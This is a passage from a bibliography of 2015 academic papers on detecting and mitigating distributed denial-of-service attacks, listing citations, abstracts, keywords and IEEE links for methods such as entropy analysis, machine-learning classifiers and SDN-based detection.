Keywords: Bayes methods; Internet; computer network security; digital signatures; file servers; pattern classification; transport protocols; DoS-DDoS attack detection; HTTP servers; Naïve Bayesian classifier; denial of service attack; distributed denial of service attack; distributed processing; e-commerce; offline signature based network intrusion detection system; Accuracy; Computer crime; Intrusion detection; Telecommunication traffic; Web servers; Denial of service attack; Naive Bayesian; Network Intrusion Detection System (ID#: 16-9084)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155851&isnumber=7155781

 

Nurohman, H.; Purwanto, Y.; Hafidudin, “Traffic Anomaly Based Detection: Anomaly Detection by Self-Similar Analysis,”
in Control, Electronics, Renewable Energy and Communications (ICCEREC), 2015 International Conference on, vol., no.,
pp. 1–6, 27–29 Aug. 2015. doi:10.1109/ICCEREC.2015.7337024
Abstract: Denial of Service (DoS) is a hot topic phenomenon lately. The intensity of DoS attacks increasing every day with the discovery of a new attack with the same type which is Distributed Denial of Service (DDoS). Both, attack the victims by flooding a lot of packet to the traffic channels at a time. This makes the flow of packets to the victim’s becomes choked and victim do not get the desired package because the density of traffic on its network. Traffic anomaly based is a good technique to detect DDoS attack. Traffic anomaly can be used by several method. One of them is self-similarity. Self-Similarity methods is suitable to the network traffic behaviour. Self-Similarity is a scale of invariant which always have the same. Today, self-similarity has been a dominant framework for modelling network traffic. It will show a plot of the traffic will have in common, even though it has a different time. For the result we use kolmogorv-smirnov to differentiate the anomaly and normal condition in each step of self-similarity. In normal condition Kolmogorov-smirnov test always give 0 and for anomaly condition give 1 for each step. 0 means that data were analysed didn’t have a large difference. Otherwise data have a large difference. Hurst estimator provide 0,645 for normal condition. For anomaly condition, hurst estimator provide 1,443. This is compatible with previous research which states that the hurst exponent from nomal traffic will provide value between 0,5<;H<;1. And the anomaly traffic is outside the range.
Keywords: computer network security; statistical testing; telecommunication traffic; DDoS attack detection; Hurst estimator; Kolmogorv-Smirnov test; anomaly condition; distributed denial of service; network traffic behaviour; network traffic modelling; packets flow; self-similar analysis; self-similarity methods; traffic anomaly based detection; traffic channels; Computer crime; Computers; Estimation; Internet; Mathematical model; Renewable energy sources; Telecommunication traffic; Anomaly; DDoS; Self-Similarity; burstiness (ID#: 16-9085)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337024&isnumber=7337022

 

Rui Wang; Zhiping Jia; Lei Ju, “An Entropy-Based Distributed DDoS Detection Mechanism in Software-Defined Networking,” in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, no., pp. 310–317, 20–22 Aug. 2015. doi:10.1109/Trustcom.2015.389
Abstract: Software-Defined Networking (SDN) and OpenFlow (OF) protocol have brought a promising architecture for the future networks. However, the centralized control and programmable characteristics also bring a lot of security challenges. Distributed denial-of-service (DDoS) attack is still a security threat to SDN. To detect the DDoS attack in SDN, many researches collect the flow tables from the switch and do the anomaly detection in the controller. But in the large scale network, the collecting process burdens the communication overload between the switches and the controller. Sampling technology may relieve this overload, but it brings a new tradeoff between sampling rate and detection accuracy. In this paper, we first extend a copy of the packet number counter of the flow entry in the OpenFlow table. Based on the flow-based nature of SDN, we design a flow statistics process in the switch. Then, we propose an entropy-based lightweight DDoS flooding attack detection model running in the OF edge switch. This achieves a distributed anomaly detection in SDN and reduces the flow collection overload to the controller. We also give the detailed algorithm which has a small calculation overload and can be easily implemented in SDN software or programmable switch, such as Open vSwitch and NetFPGA. The experimental results show that our detection mechanism can detect the attack quickly and achieve a high detection accuracy with a low false positive rate.
Keywords: computer network security; protocols; software defined networking; DDoS attack; NetFPGA; OF edge switch; OF protocol; Open vSwitch; OpenFlow table; SDN; SDN software; anomaly detection; centralized control; communication overload; distributed DDoS detection mechanism; distributed anomaly detection; distributed denial-of-service; flow collection overload; flow statistics process; flow tables; large scale network; lightweight DDoS flooding attack detection model; packet number counter; programmable characteristics; programmable switch; sampling technology; security threat; software-defined networking; Computer architecture; Computer crime; Image edge detection; Radiation detectors; Switches; DDoS; Entropy; OpenFlow (ID#: 16-9086)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345297&isnumber=7345233

 

Sharma, S.; Sahu, S.K.; Jena, S.K., “On Selection of Attributes for Entropy Based Detection of DDoS,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 1096–1100, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275756
Abstract: Distributed Denial of service (DDoS) attack is an attempt to prevent the legitimate users from using services provided by service providers. This is done through flooding their server with the unnecessary traffic. These attacks are performed on some prestigious web sites like Yahoo, Amazon and on various cloud service providers. The severity of the attack is very high, as a result the server goes down for the indefinite period of time. To detect such attempts, various methods were proposed. In this paper, an entropy-based approach is used to detect the DDoS attack. We have analyzed the effect on the entropy of all the useful packet attributes during DDoS attack and tested their usefulness against famous types of distributed denial of service attacks. During analysis, we have explained the proper choice of attributes one should make to get a better threshold during DDoS detection.
Keywords: computer network security; entropy; Amazon; DDoS attack; Web sites; Yahoo; attribute selection; cloud service providers; distributed denial of service attack; entropy based detection; Computer crime; Entropy; Floods; IP networks; Ports (Computers); Protocols; Servers; Attributes Selection; DDoS; SYN Flood (ID#: 16-9087)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275756&isnumber=7275573

 

Yadav, S.; Selvakumar, S., “Detection of Application Layer DDoS Attack by Modeling User Behavior Using Logistic Regression,” in Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, vol., no., pp. 1–6, 2–4 Sept. 2015. doi:10.1109/ICRITO.2015.7359289
Abstract: DDoS attack has been a threat to network security since a decade and it will continue to be so in the near future also. Now a days application layer DDoS attack poses a major challenge to Web servers. The main objective of Web server is to offer an uninterrupted application layer services to its benign users. But, the application layer DDoS attack blocks the services of the web server to its legitimate clients which can cause immense financial losses. Moreover, it requires very less amount of resources to perform the application layer DDoS attack. The solutions available to detect application layer DDoS attack, detect only limited number of application layer DDoS attacks. The solutions that detect all types of application layer DDoS attacks have huge complexity. To find an effective solution for the detection of application layer DDoS attack the normal user browsing behavior has to be modeled in such a way that normal user and attacker can be differentiated. In this paper, we propose a method using feature construction and logistic regression to model normal Web user browsing behavior to detect application layer DDoS attacks. The performance of the proposed method was evaluated in terms of the metrics such as total accuracy, false positive rate, and detection rate. Comparison of the proposed solution with the existing methods reveals that the proposed method performs better than the existing methods.
Keywords: computer network security; online front-ends; regression analysis; Web server services; application layer DDoS attack detection; detection rate metric; false positive rate metric; feature construction; financial losses; logistic regression; network security; normal Web user browsing behavior; performance evaluation; total accuracy metric; uninterrupted application layer services; user behavior modeling; Authentication; Computer crime; Feature extraction; Measurement; Pattern recognition; Web servers; Application Layer DDoS Attack; DDoS; Feature Construction; Logistic Regression; User Behavior (ID#: 16-9088)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7359289&isnumber=7359191

 

Girma, A.; Garuba, M.; Jiang Li; Chunmei Liu, “Analysis of DDoS Attacks and an Introduction of a Hybrid Statistical Model to Detect DDoS Attacks on Cloud Computing Environment,” in Information Technology – New Generations (ITNG), 2015 12th International Conference on, vol., no., pp. 212–217, 13–15 April 2015. doi:10.1109/ITNG.2015.40
Abstract: Cloud service availability has been one of the major concerns of cloud service providers (CSP), while hosting different cloud based information technology services by managing different resources on the internet. The vulnerability of internet, the distribute nature of cloud computing, various security issues related to cloud computing service models, and cloud’s main attributes contribute to its susceptibility of security threats associated with cloud service availability. One of the major sophisticated threats that happen to be very difficult and challenging to counter due to its distributed nature and resulted in cloud service disruption is Distributed Denial of Service (DDoS) attacks. Even though there are number of intrusion detection solutions proposed by different research groups, and cloud service providers (CSP) are currently using different detection solutions by promising that their product is well secured, there is no such a perfect solution that prevents the DDoS attack. The characteristics of DDoS attack, i.e., Having different appearance with different scenarios, make it difficult to detect. This paper will review and analyze different existing DDoS detecting techniques against different parameters, discusses their advantage and disadvantages, and propose a hybrid statistical model that could significantly mitigate these attacks and be a better alternative solution for current detection problems.
Keywords: cloud computing; computer network security; statistical analysis; CSP; DDoS attack analysis; DDoS attack detection; Internet; cloud based information technology services; cloud computing environment; cloud computing service model; cloud main attributes; cloud service availability; cloud service disruption; cloud service providers; hybrid statistical model; intrusion detection solutions; security issues; Cloud computing; Computer crime; Covariance matrices; Entropy; Hidden Markov models; Servers; Cloud Security; Cloud Service Availability; Co-Variance Matrix; DDoS attacks (ID#: 16-9089)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7113475&isnumber=7113432

 

Ndibwile, J.D.; Govardhan, A.; Okada, K.; Kadobayashi, Y., “Web Server Protection Against Application Layer DDoS Attacks Using Machine Learning and Traffic Authentication,” in Computer Software and Applications Conference (COMPSAC), 2015 IEEE 39th Annual, vol. 3, no., pp. 261–267, 1–5 July 2015. doi:10.1109/COMPSAC.2015.240
Abstract: Application layer Distributed Denial of Service (DDoS) attacks are among the deadliest kinds of attacks that have significant impact on destination servers and networks due to their ability to be launched with minimal computational resources to cause an effect of high magnitude. Commercial and government Web servers have become the primary target of these kinds of attacks, with the recent mitigation efforts struggling to deaden the problem efficiently. Most application layer DDoS attacks can successfully mimic legitimate traffic without being detected by Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS). IDSs and IPSs can also mistake a normal and legitimate activity for a malicious one, producing a False Positive (FP) that affects Web users if it is ignored or dropped. False positives in a large and complex network topology can potentially be dangerous as they may cause IDS/IPS to block the user’s benign traffic. Our focus and contributions in this paper are first, to mitigate the undetected malicious traffic mimicking legitimate traffic and developing a special anti-DDoS module for general and specific DDoS tools attacks by using a trained classifier in a random tree machine-learning algorithm. We use labeled datasets to generate rules to incorporate and fine-tune existing IDS/IPS such as Snort. Secondly, we further assist IDS/IPS by processing traffic that is classified as malicious by the IDS/IPS in order to identify FPs and route them to their intended destinations. To achieve this, our approach uses active authentication of traffic source of both legitimate and malicious traffic at the Bait and Decoy server respectively before destined to the Web server.
Keywords: Internet; computer network security; file servers; learning (artificial intelligence); pattern classification; telecommunication traffic; FP; IDS; IPS; Web server protection; Web users; application layer DDoS attacks; bait-and-decoy server; destination servers; distributed denial of service; false positive; government Web servers; intrusion detection systems; intrusion prevention systems; legitimate traffic; malicious traffic; minimal computational resources; mitigation efforts; random tree machine-learning algorithm; traffic authentication; traffic source active authentication; trained classifier; Authentication; Computer crime; Logic gates; Training; Web servers; DDoS Mitigation; False Positives; IDS/IPS; Java Script; Machine Learning (ID#: 16-9090)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7273365&isnumber=7273299

 

Olabelurin, A.; Veluru, S.; Healing, A.; Rajarajan, M., “Entropy Clustering Approach for Improving Forecasting in DDoS Attacks,” in Networking, Sensing and Control (ICNSC), 2015 IEEE 12th International Conference on, vol., no., pp. 315–320,
9–11 April 2015. doi:10.1109/ICNSC.2015.7116055
Abstract: Volume anomaly such as distributed denial-of-service (DDoS) has been around for ages but with advancement in technologies, they have become stronger, shorter and weapon of choice for attackers. Digital forensic analysis of intrusions using alerts generated by existing intrusion detection system (IDS) faces major challenges, especially for IDS deployed in large networks. In this paper, the concept of automatically sifting through a huge volume of alerts to distinguish the different stages of a DDoS attack is developed. The proposed novel framework is purpose-built to analyze multiple logs from the network for proactive forecast and timely detection of DDoS attacks, through a combined approach of Shannon-entropy concept and clustering algorithm of relevant feature variables. Experimental studies on a cyber-range simulation dataset from the project industrial partners show that the technique is able to distinguish precursor alerts for DDoS attacks, as well as the attack itself with a very low false positive rate (FPR) of 22.5%. Application of this technique greatly assists security experts in network analysis to combat DDoS attacks.
Keywords: computer network security; digital forensics; entropy; forecasting theory; pattern clustering; DDoS attacks; FPR; IDS; Shannon-entropy concept; clustering algorithm; cyber-range simulation dataset; digital forensic analysis; distributed denial-of-service; entropy clustering approach; false positive rate; forecasting; intrusion detection system; network analysis; proactive forecast; project industrial partner; volume anomaly; Algorithm design and analysis; Clustering algorithms; Computer crime; Entropy; Feature extraction; Ports (Computers); Shannon entropy; alert management; distributed denial-of-service (DDoS) detection; k-means clustering analysis; network security; online anomaly detection (ID#: 16-9091)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7116055&isnumber=7115994

 

Mousavi, S.M.; St-Hilaire, M., “Early Detection of DDoS Attacks Against SDN Controllers,” in Computing, Networking and Communications (ICNC), 2015 International Conference on, vol., no., pp. 77–81, 16–19 Feb. 2015. doi:10.1109/ICCNC.2015.7069319
Abstract: A Software Defined Network (SDN) is a new network architecture that provides central control over the network. Although central control is the major advantage of SDN, it is also a single point of failure if it is made unreachable by a Distributed Denial of Service (DDoS) Attack. To mitigate this threat, this paper proposes to use the central control of SDN for attack detection and introduces a solution that is effective and lightweight in terms of the resources that it uses. More precisely, this paper shows how DDoS attacks can exhaust controller resources and provides a solution to detect such attacks based on the entropy variation of the destination IP address. This method is able to detect DDoS within the first five hundred packets of the attack traffic.
Keywords: IP networks; computer network security; software defined networking; telecommunication traffic; DDoS attacks; Distributed Denial Of Service attack; IP address destination; SDN controllers; attack detection; attack traffic; central control; entropy variation; exhaust controller resources; network architecture; software defined network; Computer architecture; Computer crime; Control systems; Entropy; Monitoring; Process control; Controller; DDoS attack; SDN (ID#: 16-9092)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069319&isnumber=7069279

 

Satrya, G.B.; Chandra, R.L.; Yulianto, F.A., “The Detection of DDOS Flooding Attack Using Hybrid Analysis in IPv6 Networks,” in Information and Communication Technology (ICoICT ), 2015 3rd International Conference on, vol., no., pp. 240–244, 27–29 May 2015. doi:10.1109/ICoICT.2015.7231429
Abstract: DDOS attack is very popular used by attacker to disrupt a computer network. The evolution of attack and the increase of vulnerable hosts on the Internet, have made its improvement more varied and difficult to be detected in real time. Today’s popular IP protocol development is IPv6. IPv6 provides a new technology including vulnerabilities and allows the attacker to attack the system. This issue may be the obstacle to make a DDOS attack detection algorithm more efficient and accurate. Due to that fact, this paper will discuss the development of prototype to detect DDOS attack using source addresses analytical methods and analysis of network flow. This prototype can detect DDOS attacks on IPv6 with 85% accuracy for the most severe test scenarios. For the detection time, the prototype can recognize DDOS within 2 minutes 56 seconds.
Keywords: IP networks; computer network security; DDOS flooding attack detection; Distributed Denial of Service flooding attack detection; IPv6 network; Internet; computer network; network flow analysis; source addresses analytical method; Computer crime; Floods; Protocols; Prototypes; DDOS detection; IPv6; hybrid; network flow; source address analysis (ID#: 16-9093)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231429&isnumber=7231384

 

Mizukoshi, M.; Munetomo, M., “Distributed Denial of Services Attack Protection System with Genetic Algorithms on Hadoop Cluster Computing Framework,” in Evolutionary Computation (CEC), 2015 IEEE Congress on, vol., no., pp. 1575–1580, 25–28 May 2015. doi:10.1109/CEC.2015.7257075
Abstract: DDoS attacks become serious as one of the menaces of the Internet security. It is difficult to prevent because DDoS attacker send spoofing packets to victim which makes the identification of the origin of attacks very difficult. A series of techniques have been studied such as pattern matching by learning the attack pattern and abnormal traffic detection. However, pattern matching approach is not reliable because attackers always set attacks of different traffic patterns and pattern matching approach only learns from the past DDoS data. Therefore, a reliable system has to watch what kind of attacks are carried out now and investigate how to prevent those attacks. Moreover, the amount of traffic flowing through the Internet increase rapidly and thus packet analysis should be done within considerable amount of time. This paper proposes a scalable, real-time traffic pattern analysis based on genetic algorithm to detect and prevent DDoS attacks on Hadoop distributed processing infrastructure. Experimental results demonstrate the effectiveness of our scalable DDoS protection system.
Keywords: computer network security; data handling; genetic algorithms; parallel processing; telecommunication traffic; DDoS attack prevention; Hadoop cluster computing framework; Hadoop distributed processing infrastructure; Internet security; distributed denial-of-service attack protection system; genetic algorithms; scalable DDoS protection system; spoofing packets; traffic pattern analysis; Accuracy; Computer crime; Distributed processing; Genetic algorithms; Genetics; IP networks; Sparks; DDoS attack; Genetic Algorithm; Hadoop (ID#: 16-9094)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7257075&isnumber=7256859

 

Zheludev, M.; Nagradov, E., “Traffic Anomaly Detection and DDOS Attack Recognition Using Diffusion Map Technologies,” in Computer Science and Information Technologies (CSIT), 2015, vol., no., pp. 128–132, Sept. 28 2015–Oct. 2 2015. doi:10.1109/CSITechnol.2015.7358265
Abstract: This paper provides a method of mathematical representation of the traffic flow of network states. Anomalous behavior in this model is represented as a point, not grouped in clusters allocated by the “alpha-stream” process.
Keywords: computer network security; telecommunication traffic; DDOS attack recognition; diffusion map technology; mathematical representation; network state; traffic anomaly detection; traffic flow; Classification algorithms; Clustering algorithms; Computer crime; Geometry; Measurement; Telecommunication traffic; Training; Kernel methods; data analysis; diffusion maps
(ID#: 16-9095)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7358265&isnumber=7358212

 

Singh, K.J.; De, T., “DDOS Attack Detection and Mitigation Technique Based on Http Count and Verification Using CAPTCHA,” in Computational Intelligence and Networks (CINE), 2015 International Conference on, vol., no., pp. 196–197,
12–13 Jan. 2015. doi:10.1109/CINE.2015.47
Abstract: With the rapid development of internet, the number of people who are online also increases tremendously. But now a day’s we find not only growing positive use of internet but also the negative use of it. The misuse and abuse of internet is growing at an alarming rate. There are large cases of virus and worms infecting our systems having the software vulnerability. These systems can even become the clients for the bot herders. These infected system aid in launching the DDoS attack to a target server. In this paper we introduced the concept of IP blacklisting which will blocked the entire blacklisted IP address, http count filter will enable us to detect the normal and the suspected IP addresses and the CAPTCHA technique to counter check whether these suspected IP address are in control by human or botnet.
Keywords: Internet; client-server systems; computer network security; computer viruses; transport protocols; CAPTCHA; DDOS attack detection; DDOS attack mitigation technique; HTTP count filter; HTTP verification; IP address; IP blacklisting; botnet; software vulnerability; target server; virus; worms; CAPTCHAs; Computer crime; IP networks; Radiation detectors; Servers; bot; botnets; captcha; filter; http; mitigation (ID#: 16-9096)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7053830&isnumber=7053782

 

Osanaiye, O.A., “Short Paper: IP Spoofing Detection for Preventing DDoS Attack in Cloud Computing,” in Intelligence
in Next Generation Networks (ICIN), 2015 18th International Conference on
, vol., no., pp. 139–141, 17–19 Feb. 2015. doi:10.1109/ICIN.2015.7073820
Abstract: Distributed Denial of Service (DDoS) attack has been identified as the biggest security threat to service availability in Cloud Computing. It prevents legitimate Cloud Users from accessing pool of resources provided by Cloud Providers by flooding and consuming network bandwidth to exhaust servers and computing resources. A major attribute of a DDoS attack is spoofing of IP address that hides the identity of the attacker. This paper discusses different methods for detecting spoofed IP packet in Cloud Computing and proposes Host-Based Operating System (OS) fingerprinting that uses both passive and active method to match the Operating System of incoming packet from its database. Additionally, how the proposed technique can be implemented was demonstrated in Cloud Computing environment.
Keywords: IP networks; cloud computing; computer network security; operating systems (computers); resource allocation; DDoS attack prevention; IP spoofing detection; active method; cloud providers; cloud users; computing resources; distributed denial of service attack; host-based OS fingerprinting; host-based operating system fingerprinting; network bandwidth flooding; passive method; security threat; service availability; spoofed IP packet detection; Cloud computing; Computer crime; Databases; Fingerprint recognition; IP networks; Probes; Cloud Computing; DDoS attack; IP Spoofing; OS Fingerprinting (ID#: 16-9097)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073820&isnumber=7073795

 

Bongiovanni, W.; Guelfi, A.E.; Pontes, E.; Silva, A.A.A.; Fen Zhou; Kofuji, S.T., “Viterbi Algorithm for Detecting DDoS Attacks,” in Local Computer Networks (LCN), 2015 IEEE 40th Conference on, vol., no., pp. 209–212, 26–29 Oct. 2015. doi:10.1109/LCN.2015.7366308
Abstract: Distributed denial of service attacks aim at making a given computational resource unavailable to users. A substantial portion of commercial Intrusion Detection Systems operates only with detection techniques based on rules for the recognition of pre-established behavioral patterns (called signatures) that can be used to identify these types of attacks. However, the characteristics of these attacks are adaptable, compromising thus the efficiency of IDS mechanisms. Thus, the goal of this paper is to evaluate the feasibility of using the Hidden Markov Model based on Viterbi algorithm to detect distributed denial of service attacks in data communication networks. Two main contributions of this work can be described: the ability to identify anomalous behavior patterns in the data traffic with the Viterbi algorithm, as well as, to obtain feasible levels of accuracy in the detection of distributed denial of service attacks.
Keywords: Viterbi detection; computer network security; data communication; hidden Markov models; DDoS attack detection; IDS mechanism; Viterbi algorithm; anomalous behavior pattern identification; attack identification; computational resource; data communication network; data traffic; distributed denial of service attack; hidden Markov model; intrusion detection system; signature recognition; Computer crime; Computer networks; Hidden Markov models; Intrusion detection; Markov processes; Protocols
(ID#: 16-9098)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366308&isnumber=7366232

 

Hong Jiang; Shuqiao Chen; Hongchao Hu; Mingming Zhang, “Superpoint-Based Detection Against Distributed Denial of Service (DDoS) Flooding Attacks,” in Local and Metropolitan Area Networks (LANMAN 2015), The 21st IEEE International Workshop on, vol., no., pp. 1–6, 22–24 April 2015. doi:10.1109/LANMAN.2015.7114724
Abstract: DDoS flooding attack is a critical threat to the normal operation of network. However, current feature-based detection methods are cheated by hackers easily and most of these mechanisms do not differentiate between DDoS flooding attacks and legitimate random flash crowds with feature independent and location extended. To address the challenges, we propose a two-stage detection strategy by combining superpoints and flow similarity measurement. To locate the suspicious flows, polymerization degree of destination superpoints is introduced in a moving time window mechanism. Based on the suspicious flows, a sliding-detection algorithm is presented for distinguishing flooding attacks from flash crowds with similarity metrics. Computer simulation results indicate that our detection approach can detect DDoS flooding attacks efficiently and Total Variation Distance (TVD) is the most suitable metric for discriminating DDoS flooding attack flows from flash crowds. Built on flow arrivals, the proposed mechanism is practical for the attack detection on high speed links.
Keywords: computer network security; DDoS flooding attack;TVD; distributed denial of service flooding attacks; feature independent; location extended; moving time window mechanism; sliding-detection algorithm; superpoint-based detection; total variation distance; two-stage detection strategy; Computer crime; Computer hacking; Feature extraction; Floods; IP networks; Measurement; Polymers; DDoS flooding attacks; detection strategy; flow similarity measurement; superpoints (ID#: 16-9099)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7114724&isnumber=7114713

 

Bhuyan, M.H.; Kalwar, A.; Goswami, A.; Bhattacharyya, D.K.; Kalita, J.K., “Low-Rate and High-Rate Distributed DoS Attack Detection Using Partial Rank Correlation,” in Communication Systems and Network Technologies (CSNT), 2015 Fifth International Conference on, vol., no., pp. 706–710, 4–6 April 2015. doi:10.1109/CSNT.2015.24
Abstract: Distributed Denial of Service (DDoS) attacks pose a serious threat to efficient and uninterrupted Internet services. During Distributed Denial of Service (DDoS), attackers make fool of innocent servers (i.e., Slave) into reddening packets to the victim. Most low-rate DDoS attack detection mechanisms are associated with specific protocols used by the attacks. Due to the use of slave, it has been found that the traffic flow for such an attack and their response flow to the victim may have linear relationships with another. Based on this observation, we propose the Partial Rank Correlation-based Detection (PRCD) scheme to detect both low-rate and high-rate DDoS attacks. Our experimental results confirm theoretical analysis and demonstrate the effectiveness of the proposed scheme in practice.
Keywords: computer network security; protocols; PRCD scheme; high-rate distributed denial of service attacks; low-rate DDoS attack detection mechanisms; partial rank correlation; partial rank correlation-based detection scheme; protocols; traffic flow; uninterrupted Internet services; Accuracy; Bandwidth; Computer crime; Correlation; Entropy; Internet; Servers; DDoS; attack; high-rate; low-rate; network traffic; rank correlation (ID#: 16-9100)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7280010&isnumber=7279856

 

Pandiaraja, P.; Manikandan, J., “Web Proxy Based Detection and Protection Mechanisms Against Client Based HTTP Attacks,” in Circuit, Power and Computing Technologies (ICCPCT), 2015 International Conference on, vol., no., pp. 1–6, 19–20 March 2015. doi:10.1109/ICCPCT.2015.7159344
Abstract: A server side protection from client based DDoS attacks on multilevel proxy. DDoS attacks are continuously sent the threat to the network applications. Such attacks are created by some set of attackers. They create a huge the whole sum of traffic and forces it to the network. Which induces significant injury to the victim server. In a computer network client sent an HTTP request to the server for seeking application resources through a proxy server. The proxy has protected, filter, monitoring the applications against such DDoS attacks. But the client can access the server through different web proxies to seeking application resource. A web server have not at all any technique to identifying malicious client and users of the client. For the reason that considering a proxy to server traffic, proxy conceals the client information and server knows only the information of proxy. Here Hidden semi-Markov Model (HsMM) proposed to describe the time varying traffic behaviors and special behavior of the traffic. An existing system, discovery of attacks is based only the proxy server and client system behavior rather than the actual client user. In such cases, an innocent web proxy or a whole client system may blocked. So this case may affect the many innocent users on the client system. To avoid this problem, a user based approach is employed for finding locality behaviors of the user’s system with enhanced http protocol. To add a custom header in the HTTP protocol for detecting actual attacking user of the client. And also proposed a threshold based algorithm (TBAD) with encryption, decryption algorithms for reshaping the suspicious request to normal request. This method can protect the Qos of the legitimate users of client system.
Keywords: computer network security; cryptography; hidden Markov models; hypermedia; telecommunication traffic; transport protocols; HTTP attacks; HTTP protocol; HTTP request; HsMM; QoS; TBAD; Web proxies; Web proxy based detection mechanism; Web proxy based protection mechanism; Web server; attack discovery; client based DDoS attacks; client system behavior; computer network; decryption algorithm; encryption algorithm; hidden semiMarkov model; locality behaviors; multilevel proxy; proxy server; server side protection; threshold based algorithm; time varying traffic behaviors; user based approach; Computer crime; Computers; Floods; IP networks; Protocols; Web servers; Data Extraction; Threshold value; attack discovery; distributed denial of service attack; traffic modeling (ID#: 16-9101)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7159344&isnumber=7159156

 

Tang, C.; Tang, A.; Lee, E.; Lixin Tao, “Mitigating HTTP Flooding Attacks with Meta-data Analysis,” in 2015 IEEE 17th International Conference on High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), and 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS),  vol., no., pp. 1406–1411, 24–26 Aug. 2015. doi:10.1109/HPCC-CSS-ICESS.2015.203
Abstract: The rise of Distributed Denial of Service (DDoS) attacks has posed a dire threat to cloud computing services in recent years. First, it is getting increasingly difficult to discriminate legitimate traffic from malicious traffic since both are legal at the application-protocol level. Second, DDoS attacks have tremendous impacts on virtual machine performance due to the over-subscribed sharing nature of a cloud data center. To prevent the most serious HTTP GET flooding attacks, we propose a meta-data based monitoring approach, in which the behavior of malicious HTTP requests is captured through real-time and big-data analysis. The proposed DDoS defense system can provide continued service to legitimate clients even when the attacking line-rate is as high as 9 Gbps. An intelligent probe is first used to extract the meta-data about an HTTP connection, which can be thought of as (IP, URL) (Uniform Resource Locators). Then, a real-time big-data analyzing technique is applied on top of the meta-data to identify the IP addresses whose HTTP request frequency significantly surpasses the norm. The blacklist, consisting of these IP addresses, is further aggregated, enabling inline devices (firewalls and load balancers) to apply rate-limiting rules to mitigate the attacks. Our findings show that the performance of the meta-data based detection system is one order of magnitude better than the previous approach.
Keywords: Big Data; cloud computing; computer centres; data analysis; firewalls; meta data; telecommunication traffic; transport protocols; virtual machines; Big-Data analysis; DDoS attack; DDoS defense system; HTTP GET flooding attack mitigation; HTTP connection; HTTP request frequency; IP address; application-protocol level; cloud computing services; cloud data center; distributed denial of service attack; firewall; inline devices; intelligent probe; legitimate traffic; load balancer; malicious HTTP request; malicious traffic; meta-data analysis; meta-data based detection system; meta-data based monitoring approach; rate-limiting rule; virtual machine performance; Computer crime; Floods; IP networks; Protocols; Real-time systems; Servers; Uniform resource locators; DDoS; HTTP GET flooding; network protocol parser (ID#: 16-9102)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336365&isnumber=7336120

 

Godefroy, E.; Totel, E.; Hurfin, M.; Majorczyk, F., “Generation and Assessment of Correlation Rules to Detect Complex Attack Scenarios,” in Communications and Network Security (CNS), 2015 IEEE Conference on, vol., no., pp. 707–708, 28–30 Sept. 2015. doi:10.1109/CNS.2015.7346896
Abstract: Information systems can be targeted by different types of attacks. Some of them are easily detected (like a DDOS targeting the system) while others are more stealthy and consist in successive attacks steps that compromise different parts of the targeted system. The alarm referring to detected attack steps are often hidden in a tremendous amount of notifications that include false alarms. Alert correlators use correlation rules (that can be explicit, implicit or semi-explicit [3]) in order to solve this problem by extracting complex relationships between the different generated events and alerts. On the other hand, providing maintainable, complete and accurate correlation rules specifically adapted to an information system is a very difficult work. We propose an approach that, given proper input information, can build a complete and system dependent set of correlation rules derived from a high level attack scenario. We then evaluate the applicability of this method by applying it to a real system and assessing the fault tolerance in a simulated environment in a second phase.
Keywords: computer network security; fault tolerance; information systems; complex attack detection; correlation rule assessment; false alarm; fault tolerance; high level attack scenario; information system; Correlation; Correlators; Intrusion detection; Knowledge based systems; Observers; Sensors; Software; Alert correlation; Intrusion detection; Security and protection (ID#: 16-9103)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346896&isnumber=7346791

 

Jog, M.; Natu, M.; Shelke, S., “Distributed Capabilities-Based DDoS Defense,” in Pervasive Computing (ICPC), 2015 International Conference on, vol., no., pp. 1–6, 8–10 Jan. 2015. doi:10.1109/PERVASIVE.2015.7086993
Abstract: Existing strategies against DDoS are implemented as single-point solutions at different network locations. Our understanding is that, no single network location can cater to the needs of a full-proof defense solution, given the nature of DDoS and activities for its mitigation. This paper gives collective information about some important defense mechanisms discussing their advantages and limitations. Based on our understanding, we propose distribution of DDoS defense which uses improved techniques for capabilities-based traffic differentiation and scheduling-based rate-limiting. Additionally, we propose a novel approach for prediction of attack to determine the prospective attackers as well as the time-to-saturation of victim. We present two algorithms for this distribution of defense. The proposed distributed approach built with these incremental improvements in the defense activities is expected to provide better solution against the DDoS problem.
